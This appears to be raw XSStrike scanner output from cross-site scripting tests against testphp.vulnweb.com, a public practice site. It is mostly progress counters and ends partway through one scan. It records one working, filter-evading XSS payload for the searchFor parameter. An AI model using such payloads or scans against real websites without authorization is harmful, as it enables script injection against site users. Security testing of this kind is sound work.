xsstrike logs


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/artists.php with param: artist=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: artist [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/search.php with param: test=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: test [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/search.php with param: searchFor=mrt\&goButton=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: searchFor [0m
[93m[!][0m Reflections found: 1 [0m
[97m[~][0m Analysing reflections [0m
[97m[~][0m Generating payloads [0m
[93m[!][0m Payloads generated: 3072 [0m
[97m[~][0m Progress: 1/3072 [0m[97m[~][0m Progress: 2/3072 [0m[97m[~][0m Progress: 3/3072 [0m[97m[~][0m Progress: 4/3072 [0m[97m[~][0m Progress: 5/3072 [0m[97m[~][0m Progress: 6/3072 [0m[97m[~][0m Progress: 7/3072 [0m[97m[~][0m Progress: 8/3072 [0m[97m[~][0m Progress: 9/3072 [0m[97m[~][0m Progress: 10/3072 [0m[97m[~][0m Progress: 11/3072 [0m[97m[~][0m Progress: 12/3072 [0m[97m[~][0m Progress: 13/3072 [0m[91m------------------------------------------------------------[0m
[92m[+][0m Payload: <d3V%0donmOuseoVEr%0a=%0aa=prompt,a()%0dx>v3dm0s [0m
[93m[!][0m Efficiency: 92 [0m
[93m[!][0m Confidence: 10 [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/listproducts.php with param: cat=mrt\&artist=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: cat [0m
[93m[!][0m Reflections found: 1 [0m
[97m[~][0m Analysing reflections [0m
[97m[~][0m Generating payloads [0m
[93m[!][0m Payloads generated: 1536 [0m
[97m[~][0m Progress: 1/1536 [0m[97m[~][0m Progress: 2/1536 [0m[97m[~][0m Progress: 3/1536 [0m[97m[~][0m Progress: 4/1536 [0m[97m[~][0m Progress: 5/1536 [0m[97m[~][0m Progress: 6/1536 [0m[97m[~][0m Progress: 7/1536 [0m[97m[~][0m Progress: 8/1536 [0m[97m[~][0m Progress: 9/1536 [0m[97m[~][0m Progress: 10/1536 [0m[97m[~][0m Progress: 11/1536 [0m[97m[~][0m Progress: 12/1536 [0m[97m[~][0m Progress: 13/1536 [0m[97m[~][0m Progress: 14/1536 [0m[97m[~][0m Progress: 15/1536 [0m[97m[~][0m Progress: 16/1536 [0m[97m[~][0m Progress: 17/1536 [0m[97m[~][0m Progress: 18/1536 [0m[97m[~][0m Progress: 19/1536 [0m[97m[~][0m Progress: 20/1536 [0m[97m[~][0m Progress: 21/1536 [0m[97m[~][0m Progress: 22/1536 [0m[97m[~][0m Progress: 23/1536 [0m[97m[~][0m Progress: 24/1536 [0m[97m[~][0m Progress: 25/1536 [0m[97m[~][0m Progress: 26/1536 [0m[97m[~][0m Progress: 27/1536 [0m[97m[~][0m Progress: 28/1536 [0m[97m[~][0m Progress: 29/1536 [0m[97m[~][0m Progress: 30/1536 [0m[97m[~][0m Progress: 31/1536 [0m[97m[~][0m Progress: 32/1536 [0m[97m[~][0m Progress: 33/1536 [0m[97m[~][0m Progress: 34/1536 [0m[97m[~][0m Progress: 35/1536 [0m[97m[~][0m Progress: 36/1536 [0m[97m[~][0m Progress: 37/1536 [0m[97m[~][0m Progress: 38/1536 [0m[97m[~][0m Progress: 39/1536 [0m[97m[~][0m Progress: 40/1536 [0m[97m[~][0m Progress: 41/1536 [0m[97m[~][0m Progress: 42/1536 [0m[97m[~][0m Progress: 43/1536 [0m[97m[~][0m Progress: 44/1536 [0m[97m[~][0m Progress: 45/1536 [0m[97m[~][0m Progress: 46/1536 [0m[97m[~][0m Progress: 47/1536 [0m[97m[~][0m Progress: 48/1536 [0m[97m[~][0m Progress: 49/1536 [0m[97m[~][0m Progress: 50/1536 [0m[97m[~][0m Progress: 51/1536 [0m[97m[~][0m Progress: 52/1536 [0m[97m[~][0m Progress: 53/1536 [0m[97m[~][0m Progress: 54/1536 [0m[97m[~][0m Progress: 55/1536 [0m[97m[~][0m Progress: 56/1536 [0m[97m[~][0m Progress: 57/1536 [0m[97m[~][0m Progress: 58/1536 [0m[97m[~][0m Progress: 59/1536 [0m[97m[~][0m Progress: 60/1536 [0m[97m[~][0m Progress: 61/1536 [0m[97m[~][0m Progress: 62/1536 [0m[97m[~][0m Progress: 63/1536 [0m[97m[~][0m Progress: 64/1536 [0m[97m[~][0m Progress: 65/1536 [0m[97m[~][0m Progress: 66/1536 [0m[97m[~][0m Progress: 67/1536 [0m[97m[~][0m Progress: 68/1536 [0m[97m[~][0m Progress: 69/1536 [0m[97m[~][0m Progress: 70/1536 [0m[97m[~][0m Progress: 71/1536 [0m[97m[~][0m Progress: 72/1536 [0m[97m[~][0m Progress: 73/1536 [0m[97m[~][0m Progress: 74/1536 [0m[97m[~][0m Progress: 75/1536 [0m[97m[~][0m Progress: 76/1536 [0m[97m[~][0m Progress: 77/1536 [0m[97m[~][0m Progress: 78/1536 [0m[97m[~][0m Progress: 79/1536 [0m[97m[~][0m Progress: 80/1536 [0m[97m[~][0m Progress: 81/1536 [0m[97m[~][0m Progress: 82/1536 [0m[97m[~][0m Progress: 83/1536 [0m[97m[~][0m Progress: 84/1536 [0m[97m[~][0m Progress: 85/1536 [0m[97m[~][0m Progress: 86/1536 [0m[97m[~][0m Progress: 87/1536 [0m[97m[~][0m Progress: 88/1536 [0m[97m[~][0m Progress: 89/1536 [0m[97m[~][0m Progress: 90/1536 [0m[97m[~][0m Progress: 91/1536 [0m[97m[~][0m Progress: 92/1536 [0m[97m[~][0m Progress: 93/1536 [0m[97m[~][0m Progress: 94/1536 [0m[97m[~][0m Progress: 95/1536 [0m[97m[~][0m Progress: 96/1536 [0m[97m[~][0m Progress: 97/1536 [0m[97m[~][0m Progress: 98/1536 [0m[97m[~][0m Progress: 99/1536 [0m[97m[~][0m Progress: 100/1536 [0m[97m[~][0m Progress: 101/1536 [0m[97m[~][0m Progress: 102/1536 [0m[97m[~][0m Progress: 103/1536 [0m[97m[~][0m Progress: 104/1536 [0m[97m[~][0m Progress: 105/1536 [0m[97m[~][0m Progress: 106/1536 [0m[97m[~][0m Progress: 107/1536 [0m[97m[~][0m Progress: 108/1536 [0m[97m[~][0m Progress: 109/1536 [0m[97m[~][0m Progress: 110/1536 [0m[97m[~][0m Progress: 111/1536 [0m[97m[~][0m Progress: 112/1536 [0m[97m[~][0m Progress: 113/1536 [0m[97m[~][0m Progress: 114/1536 [0m[97m[~][0m Progress: 115/1536 [0m[97m[~][0m Progress: 116/1536 [0m[97m[~][0m Progress: 117/1536 [0m[97m[~][0m Progress: 118/1536 [0m[97m[~][0m Progress: 119/1536 [0m[97m[~][0m Progress: 120/1536 [0m[97m[~][0m Progress: 121/1536 [0m[97m[~][0m Progress: 122/1536 [0m[97m[~][0m Progress: 123/1536 [0m[97m[~][0m Progress: 124/1536 [0m[97m[~][0m Progress: 125/1536 [0m[97m[~][0m Progress: 126/1536 [0m[97m[~][0m Progress: 127/1536 [0m[97m[~][0m Progress: 128/1536 [0m[97m[~][0m Progress: 129/1536 [0m[97m[~][0m Progress: 130/1536 [0m[97m[~][0m Progress: 131/1536 [0m[97m[~][0m Progress: 132/1536 [0m[97m[~][0m Progress: 133/1536 [0m[97m[~][0m Progress: 134/1536 [0m[97m[~][0m Progress: 135/1536 [0m[97m[~][0m Progress: 136/1536 [0m[97m[~][0m Progress: 137/1536 [0m[97m[~][0m Progress: 138/1536 [0m[97m[~][0m Progress: 139/1536 [0m[97m[~][0m Progress: 140/1536 [0m[97m[~][0m Progress: 141/1536 [0m[97m[~][0m Progress: 142/1536 [0m[97m[~][0m Progress: 143/1536 [0m[97m[~][0m Progress: 144/1536 [0m[97m[~][0m Progress: 145/1536 [0m[97m[~][0m Progress: 146/1536 [0m[97m[~][0m Progress: 147/1536 [0m[97m[~][0m Progress: 148/1536 [0m[97m[~][0m Progress: 149/1536 [0m[97m[~][0m Progress: 150/1536 [0m[97m[~][0m Progress: 151/1536 [0m[97m[~][0m Progress: 152/1536 [0m[97m[~][0m Progress: 153/1536 [0m[97m[~][0m Progress: 154/1536 [0m[97m[~][0m Progress: 155/1536 [0m[97m[~][0m Progress: 156/1536 [0m[97m[~][0m Progress: 157/1536 [0m[97m[~][0m Progress: 158/1536 [0m[97m[~][0m Progress: 159/1536 [0m[97m[~][0m Progress: 160/1536 [0m[97m[~][0m Progress: 161/1536 [0m[97m[~][0m Progress: 162/1536 [0m[97m[~][0m Progress: 163/1536 [0m[97m[~][0m Progress: 164/1536 [0m[97m[~][0m Progress: 165/1536 [0m[97m[~][0m Progress: 166/1536 [0m[97m[~][0m Progress: 167/1536 [0m[97m[~][0m Progress: 168/1536 [0m[97m[~][0m Progress: 169/1536 [0m[97m[~][0m Progress: 170/1536 [0m[97m[~][0m Progress: 171/1536 [0m[97m[~][0m Progress: 172/1536 [0m[97m[~][0m Progress: 173/1536 [0m[97m[~][0m Progress: 174/1536 [0m[97m[~][0m Progress: 175/1536 [0m[97m[~][0m Progress: 176/1536 [0m[97m[~][0m Progress: 177/1536 [0m[97m[~][0m Progress: 178/1536 [0m[97m[~][0m Progress: 179/1536 [0m[97m[~][0m Progress: 180/1536 [0m[97m[~][0m Progress: 181/1536 [0m[97m[~][0m Progress: 182/1536 [0m[97m[~][0m Progress: 183/1536 [0m[97m[~][0m Progress: 184/1536 [0m[97m[~][0m Progress: 185/1536 [0m[97m[~][0m Progress: 186/1536 [0m[97m[~][0m Progress: 187/1536 [0m[97m[~][0m Progress: 188/1536 [0m[97m[~][0m Progress: 189/1536 [0m[97m[~][0m Progress: 190/1536 [0m[97m[~][0m Progress: 191/1536 [0m[97m[~][0m Progress: 192/1536 [0m[97m[~][0m Progress: 193/1536 [0m[97m[~][0m Progress: 194/1536 [0m[97m[~][0m Progress: 195/1536 [0m[97m[~][0m Progress: 196/1536 [0m[97m[~][0m Progress: 197/1536 [0m[97m[~][0m Progress: 198/1536 [0m[97m[~][0m Progress: 199/1536 [0m[97m[~][0m Progress: 200/1536 [0m[97m[~][0m Progress: 201/1536 [0m[97m[~][0m Progress: 202/1536 [0m[97m[~][0m Progress: 203/1536 [0m[97m[~][0m Progress: 204/1536 [0m[97m[~][0m Progress: 205/1536 [0m[97m[~][0m Progress: 206/1536 [0m[97m[~][0m Progress: 207/1536 [0m[97m[~][0m Progress: 208/1536 [0m[97m[~][0m Progress: 209/1536 [0m[97m[~][0m Progress: 210/1536 [0m[97m[~][0m Progress: 211/1536 [0m[97m[~][0m Progress: 212/1536 [0m[97m[~][0m Progress: 213/1536 [0m[97m[~][0m Progress: 214/1536 [0m[97m[~][0m Progress: 215/1536 [0m[97m[~][0m Progress: 216/1536 [0m[97m[~][0m Progress: 217/1536 [0m[97m[~][0m Progress: 218/1536 [0m[97m[~][0m Progress: 219/1536 [0m[97m[~][0m Progress: 220/1536 [0m[97m[~][0m Progress: 221/1536 [0m[97m[~][0m Progress: 222/1536 [0m[97m[~][0m Progress: 223/1536 [0m[97m[~][0m Progress: 224/1536 [0m[97m[~][0m Progress: 225/1536 [0m[97m[~][0m Progress: 226/1536 [0m[97m[~][0m Progress: 227/1536 [0m[97m[~][0m Progress: 228/1536 [0m[97m[~][0m Progress: 229/1536 [0m[97m[~][0m Progress: 230/1536 [0m[97m[~][0m Progress: 231/1536 [0m[97m[~][0m Progress: 232/1536 [0m[97m[~][0m Progress: 233/1536 [0m[97m[~][0m Progress: 234/1536 [0m[97m[~][0m Progress: 235/1536 [0m[97m[~][0m Progress: 236/1536 [0m[97m[~][0m Progress: 237/1536 [0m[97m[~][0m Progress: 238/1536 [0m[97m[~][0m Progress: 239/1536 [0m[97m[~][0m Progress: 240/1536 [0m[97m[~][0m Progress: 241/1536 [0m[97m[~][0m Progress: 242/1536 [0m[97m[~][0m Progress: 243/1536 [0m[97m[~][0m Progress: 244/1536 [0m[97m[~][0m Progress: 245/1536 [0m[97m[~][0m Progress: 246/1536 [0m[97m[~][0m Progress: 247/1536 [0m[97m[~][0m Progress: 248/1536 [0m[97m[~][0m Progress: 249/1536 [0m[97m[~][0m Progress: 250/1536 [0m[97m[~][0m Progress: 251/1536 [0m[97m[~][0m Progress: 252/1536 [0m[97m[~][0m Progress: 253/1536 [0m[97m[~][0m Progress: 254/1536 [0m[97m[~][0m Progress: 255/1536 [0m[97m[~][0m Progress: 256/1536 [0m[97m[~][0m Progress: 257/1536 [0m[97m[~][0m Progress: 258/1536 [0m[97m[~][0m Progress: 259/1536 [0m[97m[~][0m Progress: 260/1536 [0m[97m[~][0m Progress: 261/1536 [0m[97m[~][0m Progress: 262/1536 [0m[97m[~][0m Progress: 263/1536 [0m[97m[~][0m Progress: 264/1536 [0m[97m[~][0m Progress: 265/1536 [0m[97m[~][0m Progress: 266/1536 [0m[97m[~][0m Progress: 267/1536 [0m[97m[~][0m Progress: 268/1536 [0m[97m[~][0m Progress: 269/1536 [0m[97m[~][0m Progress: 270/1536 [0m[97m[~][0m Progress: 271/1536 [0m[97m[~][0m Progress: 272/1536 [0m[97m[~][0m Progress: 273/1536 [0m[97m[~][0m Progress: 274/1536 [0m[97m[~][0m Progress: 275/1536 [0m[97m[~][0m Progress: 276/1536 [0m[97m[~][0m Progress: 277/1536 [0m[97m[~][0m Progress: 278/1536 [0m[97m[~][0m Progress: 279/1536 [0m[97m[~][0m Progress: 280/1536 [0m[97m[~][0m Progress: 281/1536 [0m[97m[~][0m Progress: 282/1536 [0m[97m[~][0m Progress: 283/1536 [0m[97m[~][0m Progress: 284/1536 [0m[97m[~][0m Progress: 285/1536 [0m[97m[~][0m Progress: 286/1536 [0m[97m[~][0m Progress: 287/1536 [0m[97m[~][0m Progress: 288/1536 [0m[97m[~][0m Progress: 289/1536 [0m[97m[~][0m Progress: 290/1536 [0m[97m[~][0m Progress: 291/1536 [0m[97m[~][0m Progress: 292/1536 [0m[97m[~][0m Progress: 293/1536 [0m[97m[~][0m Progress: 294/1536 [0m[97m[~][0m Progress: 295/1536 [0m[97m[~][0m Progress: 296/1536 [0m[97m[~][0m Progress: 297/1536 [0m[97m[~][0m Progress: 298/1536 [0m[97m[~][0m Progress: 299/1536 [0m[97m[~][0m Progress: 300/1536 [0m[97m[~][0m Progress: 301/1536 [0m[97m[~][0m Progress: 302/1536 [0m[97m[~][0m Progress: 303/1536 [0m[97m[~][0m Progress: 304/1536 [0m[97m[~][0m Progress: 305/1536 [0m[97m[~][0m Progress: 306/1536 [0m[97m[~][0m Progress: 307/1536 [0m[97m[~][0m Progress: 308/1536 [0m[97m[~][0m Progress: 309/1536 [0m[97m[~][0m Progress: 310/1536 [0m[97m[~][0m Progress: 311/1536 [0m[97m[~][0m Progress: 312/1536 [0m[97m[~][0m Progress: 313/1536 [0m[97m[~][0m Progress: 314/1536 [0m[97m[~][0m Progress: 315/1536 [0m[97m[~][0m Progress: 316/1536 [0m[97m[~][0m Progress: 317/1536 [0m[97m[~][0m Progress: 318/1536 [0m[97m[~][0m Progress: 319/1536 [0m[97m[~][0m Progress: 320/1536 [0m[97m[~][0m Progress: 321/1536 [0m[97m[~][0m Progress: 322/1536 [0m[97m[~][0m Progress: 323/1536 [0m[97m[~][0m Progress: 324/1536 [0m[97m[~][0m Progress: 325/1536 [0m[97m[~][0m Progress: 326/1536 [0m[97m[~][0m Progress: 327/1536 [0m[97m[~][0m Progress: 328/1536 [0m[97m[~][0m Progress: 329/1536 [0m[97m[~][0m Progress: 330/1536 [0m[97m[~][0m Progress: 331/1536 [0m[97m[~][0m Progress: 332/1536 [0m[97m[~][0m Progress: 333/1536 [0m[97m[~][0m Progress: 334/1536 [0m[97m[~][0m Progress: 335/1536 [0m[97m[~][0m Progress: 336/1536 [0m[97m[~][0m Progress: 337/1536 [0m[97m[~][0m Progress: 338/1536 [0m[97m[~][0m Progress: 339/1536 [0m[97m[~][0m Progress: 340/1536 [0m[97m[~][0m Progress: 341/1536 [0m[97m[~][0m Progress: 342/1536 [0m[97m[~][0m Progress: 343/1536 [0m[97m[~][0m Progress: 344/1536 [0m[97m[~][0m Progress: 345/1536 [0m[97m[~][0m Progress: 346/1536 [0m[97m[~][0m Progress: 347/1536 [0m[97m[~][0m Progress: 348/1536 [0m[97m[~][0m Progress: 349/1536 [0m[97m[~][0m Progress: 350/1536 [0m[97m[~][0m Progress: 351/1536 [0m[97m[~][0m Progress: 352/1536 [0m[97m[~][0m Progress: 353/1536 [0m[97m[~][0m Progress: 354/1536 [0m[97m[~][0m Progress: 355/1536 [0m[97m[~][0m Progress: 356/1536 [0m[97m[~][0m Progress: 357/1536 [0m[97m[~][0m Progress: 358/1536 [0m[97m[~][0m Progress: 359/1536 [0m[97m[~][0m Progress: 360/1536 [0m[97m[~][0m Progress: 361/1536 [0m[97m[~][0m Progress: 362/1536 [0m[97m[~][0m Progress: 363/1536 [0m[97m[~][0m Progress: 364/1536 [0m[97m[~][0m Progress: 365/1536 [0m[97m[~][0m Progress: 366/1536 [0m[97m[~][0m Progress: 367/1536 [0m[97m[~][0m Progress: 368/1536 [0m[97m[~][0m Progress: 369/1536 [0m[97m[~][0m Progress: 370/1536 [0m[97m[~][0m Progress: 371/1536 [0m[97m[~][0m Progress: 372/1536 [0m[97m[~][0m Progress: 373/1536 [0m[97m[~][0m Progress: 374/1536 [0m[97m[~][0m Progress: 375/1536 [0m[97m[~][0m Progress: 376/1536 [0m[97m[~][0m Progress: 377/1536 [0m[97m[~][0m Progress: 378/1536 [0m[97m[~][0m Progress: 379/1536 [0m[97m[~][0m Progress: 380/1536 [0m[97m[~][0m Progress: 381/1536 [0m[97m[~][0m Progress: 382/1536 [0m[97m[~][0m Progress: 383/1536 [0m[97m[~][0m Progress: 384/1536 [0m[97m[~][0m Progress: 385/1536 [0m[97m[~][0m Progress: 386/1536 [0m[97m[~][0m Progress: 387/1536 [0m[97m[~][0m Progress: 388/1536 [0m[97m[~][0m Progress: 389/1536 [0m[97m[~][0m Progress: 390/1536 [0m[97m[~][0m Progress: 391/1536 [0m[97m[~][0m Progress: 392/1536 [0m[97m[~][0m Progress: 393/1536 [0m[97m[~][0m Progress: 394/1536 [0m[97m[~][0m Progress: 395/1536 [0m[97m[~][0m Progress: 396/1536 [0m[97m[~][0m Progress: 397/1536 [0m[97m[~][0m Progress: 398/1536 [0m[97m[~][0m Progress: 399/1536 [0m[97m[~][0m Progress: 400/1536 [0m[97m[~][0m Progress: 401/1536 [0m[97m[~][0m Progress: 402/1536 [0m[97m[~][0m Progress: 403/1536 [0m[97m[~][0m Progress: 404/1536 [0m[97m[~][0m Progress: 405/1536 [0m[97m[~][0m Progress: 406/1536 [0m[97m[~][0m Progress: 407/1536 [0m[97m[~][0m Progress: 408/1536 [0m[97m[~][0m Progress: 409/1536 [0m[97m[~][0m Progress: 410/1536 [0m[97m[~][0m Progress: 411/1536 [0m[97m[~][0m Progress: 412/1536 [0m[97m[~][0m Progress: 413/1536 [0m[97m[~][0m Progress: 414/1536 [0m[97m[~][0m Progress: 415/1536 [0m[97m[~][0m Progress: 416/1536 [0m[97m[~][0m Progress: 417/1536 [0m[97m[~][0m Progress: 418/1536 [0m[97m[~][0m Progress: 419/1536 [0m[97m[~][0m Progress: 420/1536 [0m[97m[~][0m Progress: 421/1536 [0m[97m[~][0m Progress: 422/1536 [0m[97m[~][0m Progress: 423/1536 [0m[97m[~][0m Progress: 424/1536 [0m[97m[~][0m Progress: 425/1536 [0m[97m[~][0m Progress: 426/1536 [0m[97m[~][0m Progress: 427/1536 [0m[97m[~][0m Progress: 428/1536 [0m[97m[~][0m Progress: 429/1536 [0m[97m[~][0m Progress: 430/1536 [0m[97m[~][0m Progress: 431/1536 [0m[97m[~][0m Progress: 432/1536 [0m[97m[~][0m Progress: 433/1536 [0m[97m[~][0m Progress: 434/1536 [0m[97m[~][0m Progress: 435/1536 [0m[97m[~][0m Progress: 436/1536 [0m[97m[~][0m Progress: 437/1536 [0m[97m[~][0m Progress: 438/1536 [0m[97m[~][0m Progress: 439/1536 [0m[97m[~][0m Progress: 440/1536 [0m[97m[~][0m Progress: 441/1536 [0m[97m[~][0m Progress: 442/1536 [0m[97m[~][0m Progress: 443/1536 [0m[97m[~][0m Progress: 444/1536 [0m[97m[~][0m Progress: 445/1536 [0m[97m[~][0m Progress: 446/1536 [0m[97m[~][0m Progress: 447/1536 [0m[97m[~][0m Progress: 448/1536 [0m[97m[~][0m Progress: 449/1536 [0m[97m[~][0m Progress: 450/1536 [0m[97m[~][0m Progress: 451/1536 [0m[97m[~][0m Progress: 452/1536 [0m[97m[~][0m Progress: 453/1536 [0m[97m[~][0m Progress: 454/1536 [0m[97m[~][0m Progress: 455/1536 [0m[97m[~][0m Progress: 456/1536 [0m[97m[~][0m Progress: 457/1536 [0m[97m[~][0m Progress: 458/1536 [0m[97m[~][0m Progress: 459/1536 [0m[97m[~][0m Progress: 460/1536 [0m[97m[~][0m Progress: 461/1536 [0m[97m[~][0m Progress: 462/1536 [0m[97m[~][0m Progress: 463/1536 [0m[97m[~][0m Progress: 464/1536 [0m[97m[~][0m Progress: 465/1536 [0m[97m[~][0m Progress: 466/1536 [0m[97m[~][0m Progress: 467/1536 [0m[97m[~][0m Progress: 468/1536 [0m[97m[~][0m Progress: 469/1536 [0m[97m[~][0m Progress: 470/1536 [0m[97m[~][0m Progress: 471/1536 [0m[97m[~][0m Progress: 472/1536 [0m[97m[~][0m Progress: 473/1536 [0m[97m[~][0m Progress: 474/1536 [0m[97m[~][0m Progress: 475/1536 [0m[97m[~][0m Progress: 476/1536 [0m[97m[~][0m Progress: 477/1536 [0m[97m[~][0m Progress: 478/1536 [0m[97m[~][0m Progress: 479/1536 [0m[97m[~][0m Progress: 480/1536 [0m[97m[~][0m Progress: 481/1536 [0m[97m[~][0m Progress: 482/1536 [0m[97m[~][0m Progress: 483/1536 [0m[97m[~][0m Progress: 484/1536 [0m[97m[~][0m Progress: 485/1536 [0m[97m[~][0m Progress: 486/1536 [0m[97m[~][0m Progress: 487/1536 [0m[97m[~][0m Progress: 488/1536 [0m[97m[~][0m Progress: 489/1536 [0m[97m[~][0m Progress: 490/1536 [0m[97m[~][0m Progress: 491/1536 [0m[97m[~][0m Progress: 492/1536 [0m[97m[~][0m Progress: 493/1536 [0m[97m[~][0m Progress: 494/1536 [0m[97m[~][0m Progress: 495/1536 [0m[97m[~][0m Progress: 496/1536 [0m[97m[~][0m Progress: 497/1536 [0m[97m[~][0m Progress: 498/1536 [0m[97m[~][0m Progress: 499/1536 [0m[97m[~][0m Progress: 500/1536 [0m[97m[~][0m Progress: 501/1536 [0m[97m[~][0m Progress: 502/1536 [0m[97m[~][0m Progress: 503/1536 [0m[97m[~][0m Progress: 504/1536 [0m[97m[~][0m Progress: 505/1536 [0m[97m[~][0m Progress: 506/1536 [0m[97m[~][0m Progress: 507/1536 [0m[97m[~][0m Progress: 508/1536 [0m[97m[~][0m Progress: 509/1536 [0m[97m[~][0m Progress: 510/1536 [0m[97m[~][0m Progress: 511/1536 [0m[97m[~][0m Progress: 512/1536 [0m[97m[~][0m Progress: 513/1536 [0m[97m[~][0m Progress: 514/1536 [0m[97m[~][0m Progress: 515/1536 [0m[97m[~][0m Progress: 516/1536 [0m[97m[~][0m Progress: 517/1536 [0m[97m[~][0m Progress: 518/1536 [0m[97m[~][0m Progress: 519/1536 [0m[97m[~][0m Progress: 520/1536 [0m[97m[~][0m Progress: 521/1536 [0m[97m[~][0m Progress: 522/1536 [0m[97m[~][0m Progress: 523/1536 [0m[97m[~][0m Progress: 524/1536 [0m[97m[~][0m Progress: 525/1536 [0m[97m[~][0m Progress: 526/1536 [0m[97m[~][0m Progress: 527/1536 [0m[97m[~][0m Progress: 528/1536 [0m[97m[~][0m Progress: 529/1536 [0m[97m[~][0m Progress: 530/1536 [0m[97m[~][0m Progress: 531/1536 [0m[97m[~][0m Progress: 532/1536 [0m[97m[~][0m Progress: 533/1536 [0m[97m[~][0m Progress: 534/1536 [0m[97m[~][0m Progress: 535/1536 [0m[97m[~][0m Progress: 536/1536 [0m[97m[~][0m Progress: 537/1536 [0m[97m[~][0m Progress: 538/1536 [0m[97m[~][0m Progress: 539/1536 [0m[97m[~][0m Progress: 540/1536 [0m[97m[~][0m Progress: 541/1536 [0m[97m[~][0m Progress: 542/1536 [0m[97m[~][0m Progress: 543/1536 [0m[97m[~][0m Progress: 544/1536 [0m[97m[~][0m Progress: 545/1536 [0m[97m[~][0m Progress: 546/1536 [0m[97m[~][0m Progress: 547/1536 [0m[97m[~][0m Progress: 548/1536 [0m[97m[~][0m Progress: 549/1536 [0m[97m[~][0m Progress: 550/1536 [0m[97m[~][0m Progress: 551/1536 [0m[97m[~][0m Progress: 552/1536 [0m[97m[~][0m Progress: 553/1536 [0m[97m[~][0m Progress: 554/1536 [0m[97m[~][0m Progress: 555/1536 [0m[97m[~][0m Progress: 556/1536 [0m[97m[~][0m Progress: 557/1536 [0m[97m[~][0m Progress: 558/1536 [0m[97m[~][0m Progress: 559/1536 [0m[97m[~][0m Progress: 560/1536 [0m[97m[~][0m Progress: 561/1536 [0m[97m[~][0m Progress: 562/1536 [0m[97m[~][0m Progress: 563/1536 [0m[97m[~][0m Progress: 564/1536 [0m[97m[~][0m Progress: 565/1536 [0m[97m[~][0m Progress: 566/1536 [0m[97m[~][0m Progress: 567/1536 [0m[97m[~][0m Progress: 568/1536 [0m[97m[~][0m Progress: 569/1536 [0m[97m[~][0m Progress: 570/1536 [0m[97m[~][0m Progress: 571/1536 [0m[97m[~][0m Progress: 572/1536 [0m[97m[~][0m Progress: 573/1536 [0m[97m[~][0m Progress: 574/1536 [0m[97m[~][0m Progress: 575/1536 [0m[97m[~][0m Progress: 576/1536 [0m[97m[~][0m Progress: 577/1536 [0m[97m[~][0m Progress: 578/1536 [0m[97m[~][0m Progress: 579/1536 [0m[97m[~][0m Progress: 580/1536 [0m[97m[~][0m Progress: 581/1536 [0m[97m[~][0m Progress: 582/1536 [0m[97m[~][0m Progress: 583/1536 [0m[97m[~][0m Progress: 584/1536 [0m[97m[~][0m Progress: 585/1536 [0m[97m[~][0m Progress: 586/1536 [0m[97m[~][0m Progress: 587/1536 [0m[97m[~][0m Progress: 588/1536 [0m[97m[~][0m Progress: 589/1536 [0m[97m[~][0m Progress: 590/1536 [0m[97m[~][0m Progress: 591/1536 [0m[97m[~][0m Progress: 592/1536 [0m[97m[~][0m Progress: 593/1536 [0m[97m[~][0m Progress: 594/1536 [0m[97m[~][0m Progress: 595/1536 [0m[97m[~][0m Progress: 596/1536 [0m[97m[~][0m Progress: 597/1536 [0m[97m[~][0m Progress: 598/1536 [0m[97m[~][0m Progress: 599/1536 [0m[97m[~][0m Progress: 600/1536 [0m[97m[~][0m Progress: 601/1536 [0m[97m[~][0m Progress: 602/1536 [0m[97m[~][0m Progress: 603/1536 [0m[97m[~][0m Progress: 604/1536 [0m[97m[~][0m Progress: 605/1536 [0m[97m[~][0m Progress: 606/1536 [0m[97m[~][0m Progress: 607/1536 [0m[97m[~][0m Progress: 608/1536 [0m[97m[~][0m Progress: 609/1536 [0m[97m[~][0m Progress: 610/1536 [0m[97m[~][0m Progress: 611/1536 [0m[97m[~][0m Progress: 612/1536 [0m[97m[~][0m Progress: 613/1536 [0m[97m[~][0m Progress: 614/1536 [0m[97m[~][0m Progress: 615/1536 [0m[97m[~][0m Progress: 616/1536 [0m[97m[~][0m Progress: 617/1536 [0m[97m[~][0m Progress: 618/1536 [0m[97m[~][0m Progress: 619/1536 [0m[97m[~][0m Progress: 620/1536 [0m[97m[~][0m Progress: 621/1536 [0m[97m[~][0m Progress: 622/1536 [0m[97m[~][0m Progress: 623/1536 [0m[97m[~][0m Progress: 624/1536 [0m[97m[~][0m Progress: 625/1536 [0m[97m[~][0m Progress: 626/1536 [0m[97m[~][0m Progress: 627/1536 [0m[97m[~][0m Progress: 628/1536 [0m[97m[~][0m Progress: 629/1536 [0m[97m[~][0m Progress: 630/1536 [0m[97m[~][0m Progress: 631/1536 [0m[97m[~][0m Progress: 632/1536 [0m[97m[~][0m Progress: 633/1536 [0m[97m[~][0m Progress: 634/1536 [0m[97m[~][0m Progress: 635/1536 [0m[97m[~][0m Progress: 636/1536 [0m[97m[~][0m Progress: 637/1536 [0m[97m[~][0m Progress: 638/1536 [0m[97m[~][0m Progress: 639/1536 [0m[97m[~][0m Progress: 640/1536 [0m[97m[~][0m Progress: 641/1536 [0m[97m[~][0m Progress: 642/1536 [0m[97m[~][0m Progress: 643/1536 [0m[97m[~][0m Progress: 644/1536 [0m[97m[~][0m Progress: 645/1536 [0m[97m[~][0m Progress: 646/1536 [0m[97m[~][0m Progress: 647/1536 [0m[97m[~][0m Progress: 648/1536 [0m[97m[~][0m Progress: 649/1536 [0m[97m[~][0m Progress: 650/1536 [0m[97m[~][0m Progress: 651/1536 [0m[97m[~][0m Progress: 652/1536 [0m[97m[~][0m Progress: 653/1536 [0m[97m[~][0m Progress: 654/1536 [0m[97m[~][0m Progress: 655/1536 [0m[97m[~][0m Progress: 656/1536 [0m[97m[~][0m Progress: 657/1536 [0m[97m[~][0m Progress: 658/1536 [0m[97m[~][0m Progress: 659/1536 [0m[97m[~][0m Progress: 660/1536 [0m